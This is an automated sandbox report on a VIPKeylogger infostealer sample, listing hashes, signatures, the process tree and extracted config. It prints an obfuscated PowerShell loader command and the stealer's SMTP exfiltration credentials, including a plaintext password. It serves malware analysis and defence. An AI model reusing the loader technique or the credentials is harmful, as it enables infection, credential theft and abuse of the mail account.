Analysis
-
max time kernel
144s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 03:06
Static task
static1
Behavioral task
behavioral1
Sample
855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe
Resource
win10v2004-20241007-en
General
-
Target
855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe
-
Size
1.0MB
-
MD5
ca3706dd6a93c5928ee3252054a7ec74
-
SHA1
402c4c006bf0e4d7afec7687f6033dccf11c6aa1
-
SHA256
855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e
-
SHA512
e83540a28bb8b6a014d40cc66842b0c045e712f894df967ade6939461120f61a9580c85c3915aa8103c4faa40077a26d9e9dbecfc7086a9529105c2e409b048d
-
SSDEEP
24576:Ij+EfvosO3Hx7JwmNG3Ap137dboaPjyMi76Kb0:Y+MvpoOt3IRM+i76f
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
JA-*2020antonio - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 28 3512 msiexec.exe 32 3512 msiexec.exe 36 3512 msiexec.exe 38 3512 msiexec.exe 40 3512 msiexec.exe 47 3512 msiexec.exe 49 3512 msiexec.exe 52 3512 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 drive.google.com 28 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3512 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2224 powershell.exe 3512 msiexec.exe -
pid Process 2224 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2224 powershell.exe 2224 powershell.exe 2224 powershell.exe 2224 powershell.exe 2224 powershell.exe 2224 powershell.exe 2224 powershell.exe 3512 msiexec.exe 3512 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2224 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2224 powershell.exe Token: SeIncreaseQuotaPrivilege 2224 powershell.exe Token: SeSecurityPrivilege 2224 powershell.exe Token: SeTakeOwnershipPrivilege 2224 powershell.exe Token: SeLoadDriverPrivilege 2224 powershell.exe Token: SeSystemProfilePrivilege 2224 powershell.exe Token: SeSystemtimePrivilege 2224 powershell.exe Token: SeProfSingleProcessPrivilege 2224 powershell.exe Token: SeIncBasePriorityPrivilege 2224 powershell.exe Token: SeCreatePagefilePrivilege 2224 powershell.exe Token: SeBackupPrivilege 2224 powershell.exe Token: SeRestorePrivilege 2224 powershell.exe Token: SeShutdownPrivilege 2224 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeSystemEnvironmentPrivilege 2224 powershell.exe Token: SeRemoteShutdownPrivilege 2224 powershell.exe Token: SeUndockPrivilege 2224 powershell.exe Token: SeManageVolumePrivilege 2224 powershell.exe Token: 33 2224 powershell.exe Token: 34 2224 powershell.exe Token: 35 2224 powershell.exe Token: 36 2224 powershell.exe Token: SeDebugPrivilege 3512 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4616 wrote to memory of 2224 4616 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe 83 PID 4616 wrote to memory of 2224 4616 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe 83 PID 4616 wrote to memory of 2224 4616 855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe 83 PID 2224 wrote to memory of 3512 2224 powershell.exe 98 PID 2224 wrote to memory of 3512 2224 powershell.exe 98 PID 2224 wrote to memory of 3512 2224 powershell.exe 98 PID 2224 wrote to memory of 3512 2224 powershell.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe"C:\Users\Admin\AppData\Local\Temp\855acbd89e8548eaaa06d25d0c767f6a1d550afd766c145d04a3fbc2eae6b80e.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Lucid=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\Polysulfonate\sangersken\Thiostannous.Acu';$Astelic=$Lucid.SubString(38084,3);.$Astelic($Lucid)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3512
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
339KB
MD539b0c0cf6d25b364d98840393dbea7f3
SHA1eb6abe677a18bc3a161c5994c17c9e71f36c5858
SHA256fd00d2f748df7bf57d8f1b8ecd96c7c7d48c1d8c09f51b60e28604909e1ddbf8
SHA5122717f5f40538f76a19856f2b381a47c6a8ada9d88c0db1d0c4a5c1a56f01413d95cf309c2775412ed36ac2e2f5e9d175cae9cd97caae49ab41f5c489a5821942
-
Filesize
70KB
MD548f0b11394175f6bb32ab16ce8aaa446
SHA1a3b755ba1fb7a92c5196a43e386eb0a845e6f828
SHA25632de1d7c55c09a44da7c79a55e1653a6a8a1f9215259bbb2b1defd7a6bf0c9a0
SHA512f4f016d1655b4bbd90effc5e5d090b683f9a9fb76f5c02e78536cfb1bc3ba185df648ba8eec5c140ff5868b7b5860fa0fb07242290565335cabfa5af3c66a941